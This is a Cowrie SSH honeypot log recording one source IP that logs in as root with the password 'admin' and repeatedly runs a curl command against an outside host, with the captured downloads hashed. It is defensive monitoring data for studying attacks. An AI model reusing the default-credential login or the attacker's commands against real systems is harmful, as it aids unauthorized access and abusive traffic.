{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39820,"dst_ip":"1.2.3.4","dst_port":22,"session":"26f25614e1ff","protocol":"ssh","message":"New connection: 212.227.125.160:39820 (1.2.3.4:22) [session: 26f25614e1ff]","sensor":"my-vps","timestamp":"2025-08-31T09:00:05.603774Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.8","message":"Remote SSH version: SSH-2.0-libssh_0.9.8","sensor":"my-vps","timestamp":"2025-08-31T09:00:05.617671Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:05.893465Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:05.898488Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:05.997260Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:05.998276Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:06.128797Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:06.134000Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.client.kex","hassh":"3335afa7a75e84f8348f05c623c5ecf9","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 3335afa7a75e84f8348f05c623c5ecf9","sensor":"my-vps","timestamp":"2025-08-31T09:00:06.135653Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-31T09:00:06.323290Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:06.382599Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:06.386770Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:06.389372Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:06.391336Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:06.396231Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:07.025145Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:07.025945Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:07.029425Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:07.063848Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:07.064587Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:07.153934Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:07.158819Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:07.181237Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:07.181768Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:07.205476Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:07.249881Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:07.254809Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:07.778011Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:07.778493Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:07.826862Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:07.827653Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:07.889433Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:07.889935Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:07.948191Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:07.948689Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:08.002626Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:08.006779Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:08.057971Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:08.058723Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:08.061134Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:08.065517Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:08.077134Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:08.084346Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:08.092667Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:08.141321Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:08.143653Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:08.699720Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:08.702063Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:08.731781Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:08.734015Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:08.737424Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:08.761820Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:08.764102Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:08.791789Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:08.824984Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:08.830263Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:08.857339Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:08.859488Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:08.862827Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:08.864660Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:08.868186Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:08.876886Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:08.896799Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:08.919045Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:08.949252Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:08.951356Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:08.955382Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:09.039329Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:09.040635Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:09.042739Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:09.043325Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:09.045614Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:09.048412Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:09.100510Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:09.101776Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:09.145946Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:09.147328Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:09.186610Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:09.188429Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:09.194394Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:09.830881Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:09.831372Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
